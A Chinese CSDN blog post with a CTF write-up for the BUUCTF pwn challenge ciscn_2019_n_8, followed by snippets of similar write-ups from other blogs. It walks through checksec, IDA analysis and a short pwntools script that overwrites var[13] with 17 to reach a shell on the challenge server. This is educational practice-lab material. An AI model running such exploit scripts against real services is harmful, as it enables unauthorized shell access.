[BUUCTF] ciscn_2019_n_8

于 2024-04-14 22:13:54 发布
阅读量258 收藏 3
点赞数 6
分类专栏: pwn学习 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lucien_Carr/article/details/137755867
版权

0. 环境

Ubantu-22.04.4

1. 查看文件格式

终端中输入命令

checksec --file='filename'        # filename为下载文件的自定义名称

结果为

开了canary、NX和PIE,似乎防得很严实

终端中输入命令

file 'filename'

输出为

32位程序,放到IDA中继续分析

2. IDA分析程序

1. main函数

 主函数里就调用了system函数,运气很好。

观察选择条件,只需要满足var[13] = 17就可以。前面有scanf函数,可以直接向var数组输入。

3. 分析思路

这道题非常简单(甚至比ret2text简单...),只需要满足让系统调用system函数的条件,即将var[13]这个数组里全部填上17即可。

4. 构造exp

直接上脚本

# coding: utf-8    #python2.7中文注释
from pwn import *

r = remote("网址",端口号)

offset = 14    # var[13]一共有14个元素
payload = p32(17) * offset

r.sendline(payload)
r.interactive()

攻击成功,运行结果如下

Lucien_Carr
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 545
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4355
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
ciscn_2019_n_8 buuctf
XDiku的博客
01-21 662
ciscn_2019_n_8
buuctfciscn_2019_n_8
最新发布
weixin_54452942的博客
04-12 512
两个方法解题
ciscn_2019_n_8【BUUCTF
qq_41696518的博客
08-26 350
ciscn_2019_n_8
BUUCTF ciscn_2019_n_8
红叶的博客
10-31 265
一道通过Checksec让没看源代码的你觉得难度很高的题。
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2616
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
BUUCTF ciscn_2019_c_1(ret2libc)
weixin_45441024的博客
01-04 409
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4063
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
[buuctf]ciscn_2019_n_8
逆向萌新的博客
06-19 451
[buuctf]ciscn_2019_n_8
buuctf ciscn_2019_n_8
carol2358的博客
04-15 274
ida: 直接有sh,只要让var[13]等于17就可以 exp: from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...
Buuctf(pwn)ciscn_2019_n_8
半岛铁盒的博客
03-28 237
保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了
BUUCTF - PWN】ciscn_2019_n_8
古月浪子的博客
03-27 1148
checksec一下,好叭全开 IDA打开看看,var是int数组,如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 1998
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
BUUCTF-PWN-ciscn_2019_n_8
Henlenl的博客
05-18 224
文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) IDA 分析 其实我们应该nc 连一下的查看远程程序运行情况 丢入 32位IDA分析一下 很显然 程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2276
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
BUUCTF ciscn_2019_n_1
RookieMOR的博客
05-14 644
1.下载文件,用checksec一下: 2.用IDA64查看,进入func函数: 当v2=11.28125时获得flag,但只有v1的输入,没有v2输入。因为有一个gets函数,点击v1,v2可以知道,v1与v2差44个字节,可以通过输入v1的值去改变v2的值,实现栈溢出。 查看汇编可以看到有一个uconiss的比较指令,把xmm0与cs:dword_4007F4,由movss可以知道xmme0是v1或v2的值,那么点击dword_4007F4 看到一个 dd ,百度一下可以知道,.
android各种开源框架总结(持续更新)
旺达的专栏
03-04 729
如果说现在的android开发为什么效率提高这么多,那就是各种开源框架的丰富,以前,你要造一辆车,你需要造发动机,造轮子,造所有的东西,现在呢,嗯,只需要造外观啦,你不需要关心太多引擎的内部(但是原理还是要了解的),你不用关心轮子怎么造,只需要关心用哪一家的轮子更好,更符合我们整个车子的定位,是不是爽歪歪啦,下面就开始吧。
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络...根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值